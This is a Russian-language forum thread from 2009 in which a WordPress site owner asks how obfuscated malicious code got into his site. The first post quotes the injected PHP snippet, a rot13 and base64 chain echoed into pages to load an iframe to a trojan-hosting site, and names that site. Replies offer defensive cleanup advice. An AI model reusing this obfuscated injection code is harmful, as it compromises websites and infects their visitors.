[Помогите] Добавили код вируса на сайт на WP!

Тема в разделе "Wordpress", создана пользователем crashvlad, 2 апр 2009.

Статус темы:
Закрыта.
Модераторы: Sorcus
  1. crashvlad

    crashvlad Постоялец

    Регистр.:
    2 фев 2008
    Сообщения:
    138
    Симпатии:
    104
    На днях зашел на свой сайт и мне ИЕ сразу предложил установить какой-то ActiveX, до этого такого никогда не было, стал смотреть хтмл-код на главной и обнаружил код ссылки ифрейм на другой сайт, на котором подгружается троян. Был в шоке.

    Стал на фтп просматривать файлы, которые в последние дни менялись и обнаружил изменения в файле wp-blog-header.php, стал смотреть в нем, ссылки нет, но есть код:


    $s="CUMmMJ56pvOzMKN9VaIaM2Z6Y";
    $h="l9dpzMapzIupay2M3W3pzclrJ";
    $j="IfYaOvrv9zqacwrKWzM2k5paM";
    $u="upP9jqULgo3MuY2A2Y2A2YlVt";
    $p="naMkM3H9ZFO1paM0qJp9ZFOmMJ";
    $n="56pz9vMKSlMG0jCwjiqaAyoaclCt==";
    echo str_rot13(base64_decode(str_rot13($s.$h.$j.$u.$p.$n)));


    удалил его и эта ссылка пропала. поменял после этого CHMOD этого файла, поменял пароль на фтп.

    ссылка шла на сайт westernelitejewelry.com

    Вопрос такой, как этот код могли добавить в файл и кто-то сталкивался с таким?
     
  2. o_nix

    o_nix

    Регистр.:
    7 ноя 2007
    Сообщения:
    1.073
    Симпатии:
    1.037
    какой CHMOD поставил и какой он был до этого ??
    Спрашиваю тк за своё волнуюсь ...

    А вообще скорее всего ftp пароль стыбзили вывод трой на компе ... или дырявый хостер (кто кстате?)...
     
  3. crashvlad

    crashvlad Постоялец

    Регистр.:
    2 фев 2008
    Сообщения:
    138
    Симпатии:
    104
    слушай, соврал я, CHMOD 644 был и такой и остался, забыл поменять. хостер местный, эстонский, полтора года никаких проблем не было. есет нод32 на компе стоит, постоянно проверку делаю, ничего не находил.
     
  4. itex

    itex

    Регистр.:
    15 ноя 2007
    Сообщения:
    274
    Симпатии:
    64
    Как и в аналогичных случаях проверить все на вирусы и поменять пароли. Если еще раз заразят сайт, то значит такой уж хостер.
     
  5. -Zveroboy-

    -Zveroboy- Создатель

    Регистр.:
    21 ноя 2008
    Сообщения:
    33
    Симпатии:
    8
    Просмотри логи ftp, если есть панель ее логи. Если есть бекапы проекта, сверь код со старым бекапом, возможно залили php шелл или другой (тогда антивирус не поможет).
    Когда будешь настраивать все не забудь установить логгирование на фтп, на панели, локальных входов. Можешь еще соорудить отслеживатель изменений в файлах проекта.
     
    crashvlad нравится это.
  6. Driller

    Driller Постоялец

    Регистр.:
    10 май 2007
    Сообщения:
    61
    Симпатии:
    1
    не пользуйтесь браузером IE, у него туева куча дырок, троянцы хавает как здрасти... пользуйтесь лучше Оперой
     
  7. crashvlad

    crashvlad Постоялец

    Регистр.:
    2 фев 2008
    Сообщения:
    138
    Симпатии:
    104
    я не спрашивал вашего мнения о том, каким мне браузером пользоваться, тема вообще о другом, а набирание постов на нулледе не приветствуется! :mad:
     
  8. IduKuru

    IduKuru

    Регистр.:
    20 янв 2008
    Сообщения:
    150
    Симпатии:
    20
    было тоже самое
    пользовался фришной проксей, после этого увели пасс на ftp и залили на сайт шифрованный редирект
     
  9. Limmer

    Limmer

    Регистр.:
    3 июн 2008
    Сообщения:
    206
    Симпатии:
    45
    у меня была такая же тема на собственном серваке, какого-то фига во все индексные файлы начал добавлять код iframe причем в самый конец файлов, никто понять не мог как и откуда такое могло произойти, в итоге админ прочекил антивирем сервак и были поставлены права 444 на файлы
     
    crashvlad нравится это.
Статус темы:
Закрыта.